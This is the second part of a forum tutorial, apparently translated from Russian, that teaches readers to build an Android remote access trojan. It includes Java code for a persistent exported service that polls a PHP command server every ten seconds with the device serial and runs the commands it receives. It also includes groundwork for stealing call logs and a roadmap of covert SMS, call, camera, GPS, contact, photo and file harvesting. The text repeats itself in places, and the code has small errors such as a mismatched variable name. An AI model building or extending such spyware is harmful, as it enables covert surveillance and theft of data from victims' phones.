Contents of the article:
1. Link to the first article.
Hello and good evening to all readers (it seems that this will become my main greeting). And so, this is already the second article on the topic of creating a RAT for Android in Java. If anyone has any questions from the previous article, ask in this one, no problem.
I would also like to note that MainService is now called differently, namely - TranosService. Why such a name? Well, I don't know myself. It just occurred to me and I decided to remake it (I think that no one will have problems because of the name change).
In this article, we will create plugs (the WEB part that will issue the tasks we need) and a part of the functionality that will be expanded. For further work, we will need to download two main packages from GitHub and a couple of additional ones. I advise you not to download them via Gradle (although some will still have to be downloaded via it), but download them directly and put them in the project, since this will allow you to further expand the functionality existing in these packages.
2. Downloading packages and configuring them
This and this package will need to be downloaded as an archive and dropped into the project folder. (We will need the modules and ServiceReceiver folder later, you don't have to create them yet)
We will supplement them in the future because they do not have all the functionality we need. The most unpleasant thing about this method is that there will be package names written there, which we will need to replace. It is not difficult, but it will take you 5-10 minutes of extra time.
After you have downloaded and unpacked the packages into the project folder, you need to build it and view the list of errors below. You need to change all package names to your own.
But we will install the package for http requests and log output via Gradle. To do this, go to the build.gradle file (Module: app) and add the following code to dependencies, and then either run the project build or click the "Sync Project with Gradle Files" button so that Gradle installs the packages.
3. Creating a WEB plug and a method for sending requests
To create a plug, you can use any hosting (even a local site, but then, when the program is released, you will not be able to do without a full-fledged site, or without a static IP and OpenServer or No-IP). For those who have a static IP and want to make their local site global, I will make a short article (or I will write how to do it as a bonus).
If you are using a local site, you will need:
4. Defining and processing the required methods
Let's write our service in the manifest. (Instead of com.tranos.app.TranosService , write your own)
Well, now it's time to get down to the main highlight of our program - the code. In TranosService (the name of MainService from the previous article has changed, if you have a different one, you don't have to change it) we'll add a new line.
And now let's change our variable with the stream a little (it was called obtainTask)
But let me guess. Did you make any mistakes? Then we'll fix them.
Let's create a query function that will receive tasks.
Okay, we've sorted that out too, but we still have at least one more error. We still don't have a Test function, so let's create one.
I think that everything will be clear from the comments, and the imports that you are missing can be added by clicking on the red word and using the Alt + Enter combination, or by hovering over the red lamp that should appear on the left (P.S. don't forget that the project is being done in Android Studio, well, just in case, suddenly someone is still with Eclipse).
5. Bonus
A bonus only for those who downloaded the packages not using Gradle, but so to speak, manually and adjusted everything to suit their project.
So, the first thing we'll do is go in
-> mobilehardware
-> Base
-> BaseData
And let's add the first additional class CallLogs.
For now, this is a preparation for the future.
6. Conclusion
In this article, we made it so that our client receives commands from the server and performs the actions we need (yes, there is only one, but that's for now). In the next part, we will add a method for receiving calls from the device, and maybe even messages (we'll see how the article goes).
Further guidance and actions will be in the following chapters, so don't miss them. Write your suggestions for expanding the functionality and any other ideas you have.
- Greetings
- Downloading packages
- Creating a WEB plug and a method for sending requests
- Defining and processing the required methods
- Bonus
- Conclusion
1. Link to the first article.
Hello and good evening to all readers (it seems that this will become my main greeting). And so, this is already the second article on the topic of creating a RAT for Android in Java. If anyone has any questions from the previous article, ask in this one, no problem.
I would also like to note that MainService is now called differently, namely - TranosService. Why such a name? Well, I don't know myself. It just occurred to me and I decided to remake it (I think that no one will have problems because of the name change).
In this article, we will create plugs (the WEB part that will issue the tasks we need) and a part of the functionality that will be expanded. For further work, we will need to download two main packages from GitHub and a couple of additional ones. I advise you not to download them via Gradle (although some will still have to be downloaded via it), but download them directly and put them in the project, since this will allow you to further expand the functionality existing in these packages.
2. Downloading packages and configuring them
This and this package will need to be downloaded as an archive and dropped into the project folder. (We will need the modules and ServiceReceiver folder later, you don't have to create them yet)
We will supplement them in the future because they do not have all the functionality we need. The most unpleasant thing about this method is that there will be package names written there, which we will need to replace. It is not difficult, but it will take you 5-10 minutes of extra time.
After you have downloaded and unpacked the packages into the project folder, you need to build it and view the list of errors below. You need to change all package names to your own.
But we will install the package for http requests and log output via Gradle. To do this, go to the build.gradle file (Module: app) and add the following code to dependencies, and then either run the project build or click the "Sync Project with Gradle Files" button so that Gradle installs the packages.
Java:
dependencies {
implementation 'com.github.kevinsawicki:http-request:5.6'
implementation 'com.orhanobut:logger:2.2.0'
}To create a plug, you can use any hosting (even a local site, but then, when the program is released, you will not be able to do without a full-fledged site, or without a static IP and OpenServer or No-IP). For those who have a static IP and want to make their local site global, I will make a short article (or I will write how to do it as a bonus).
If you are using a local site, you will need:
- Android smartphone (I didn't figure out how to make the emulator able to access the local network) or install an Android emulator that has a bridge mode (Nox seems to have one, but it didn't work for me, so a smartphone is still better).
- Create a PHP file on your local site (any name, but I will have function.php)
- Let's write the code.
- Well, we will get a link to a file with the IP address of your PC in the local network, for example https://192.168.1.2/
- Create PHP file
- Write code
- Copy the link to the file and paste it into the desired location (yes, it's funny)
PHP:
<?php
if($_GET['id'])
echo json_encode(['response' => 'test_function_hello']);
else
echo json_encode(['response' => 'Error']);Let's write our service in the manifest. (Instead of com.tranos.app.TranosService , write your own)
XML:
<service android:name="com.tranos.app.TranosService"
android:enabled="true"
android:exported="true"
android:persistent="true">
</service>
Java:
private String URL_DEFAULT = "http://192.168.0.150/"; //here is your link WITHOUT a file to a local site or to a hosting
Java:
public class TranosService extends Service {
private String URL_DEFAULT = "http://192.168.0.150/"7
private final IBinder myBinder = new MyLocalBinder() ;
public class MyLocalBinder extends Binder {
TranosService getService() { return TranosService.this; }
}
@Override
public IBinder onBind (Intent arg0) { return myBinder; }
Java:
Thread obtainTask = new Thread() {
@SuppressLint("Wakelock") @Override
public void run() {
Looper.prepare();
while (true) {
try {
String serialId = BuildHelper.mobGetBuildInfo().getString("serial"); //получаем серийный идентификатор устройства
//String serialId = MobileHardWareHelper.mobileBuild().getString("serial"); //результат один и тот же что и с верхним
String result = query(String.format("%sfunction.php?id=%s", URL_DEFAULT, serial)); //отправляем запрос на наш сайт (вместо function напишите название своего файла с сайта)
String response = new JSONObject(result).getString("response"); //получаем результат из response, в нашем случае это будет test_function_hello
List<String> list = new ArrayList<String>(Arrays.asList(response.split("_"))); //разбиваем наш результат по нижнему подчеркиванию, получаем 0->test | 1->function | 2->hello
if (list.size() > 0) { //если у нас не пустой результат
if (list.get(0).contains("test")) { //если у нас в первым заданием будет test
Test(list); //то запускаем функцию Test, которая будет сделана чуть ниже и передаем ей наш массив с параметрами
}
}
} catch (Exception e) {
}
try {
Thread.sleep(10000);
} catch (Exception e) {
obtainTask.start();
}
}
}
};But let me guess. Did you make any mistakes? Then we'll fix them.
Let's create a query function that will receive tasks.
Java:
public String query(String url ) {
String response = "Network unavailable";
if(true) { //NetworkUtils.isNetworkAvailable() тут будет проверка на интернет
try {
response = HttpRequest.get(url).accept("application/json").body();
} catch (Exception e) {
return response;
}
}
return response ;
}
Java:
private void Test(List<String> list) {
Logger.d(list); //выведет нам наш массив
if(list.get(1).contains("function")) {
Logger.d("Функция успешно получена и обработана");
if(list.get(2).contains("hello")) {
Logger.d("Привет, мир, я новый бот.");
}
}
}5. Bonus
A bonus only for those who downloaded the packages not using Gradle, but so to speak, manually and adjusted everything to suit their project.
So, the first thing we'll do is go in
-> mobilehardware
-> Base
-> BaseData
And let's add the first additional class CallLogs.
Java:
public static class CallLogs {
public static final String CALL_NUMBER = "callNumber";
public static final String CALL_NAME = "callName";
public static final String CALL_DATE = "callDate";
public static final String CALL_TYPE = "callType";
public static final String CALL_DURATION = "callDuration";
}For now, this is a preparation for the future.
6. Conclusion
In this article, we made it so that our client receives commands from the server and performs the actions we need (yes, there is only one, but that's for now). In the next part, we will add a method for receiving calls from the device, and maybe even messages (we'll see how the article goes).
Further guidance and actions will be in the following chapters, so don't miss them. Write your suggestions for expanding the functionality and any other ideas you have.
Where there is a @feature mark , this functionality is implemented at the time of writing.
Where there is a @todo mark , this functionality is under development and should appear soon.
Where there is an @issue mark , it means that this functionality was suggested by one of the users and aroused the interest of the author and will be implemented soon.
Where there is a @todo mark , this functionality is under development and should appear soon.
Where there is an @issue mark , it means that this functionality was suggested by one of the users and aroused the interest of the author and will be implemented soon.
- Receiving commands from the @feature website
- Receiving commands via Telegram bot
- Receiving commands via SMS @todo
- Working with messages
- Receiving @feature messages
- Receive messages with a specific @todo user
- message Deleting @todo
- Blocking messages
- Sending messages to @todo
- Working with calls
- Receiving calls @feature
- Receiving calls with a specific user
- Deleting calls
- Call blocking
- Calling subscriber @todo
- Call recording
- Working with the camera
- Photography by @feature cameras
- Video shooting
- Sound recording
- Getting GPS data @feature
- Getting a list of contacts from a phone @feature
- Getting media (photos) @feature
- Access to Explorer (file system access)
- Getting information about the device (where would we be without it) @feature
- Getting Root Rights
- Smartphone control
- Volume @todo
- Brightness @todo
- Wallpaper
- Other
